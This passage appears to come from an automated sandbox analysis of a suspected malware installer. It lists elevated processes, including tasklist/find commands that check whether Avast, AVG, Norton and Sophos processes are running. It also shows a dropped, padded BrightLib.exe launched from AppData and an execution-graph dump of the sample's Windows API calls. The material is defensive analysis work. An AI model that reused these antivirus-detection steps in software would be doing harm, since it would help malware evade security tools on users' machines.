                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "avastui.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                                              Start time:06:17:46
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:846'325'235 bytes
                                                                                                                                                                                                                                                              MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:18.6%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:20.7%
                                                                                                                                                                                                                                                                Total number of Nodes:1525
                                                                                                                                                                                                                                                                Total number of Limit Nodes:34
                                                                                                                                                                                                                                                                execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 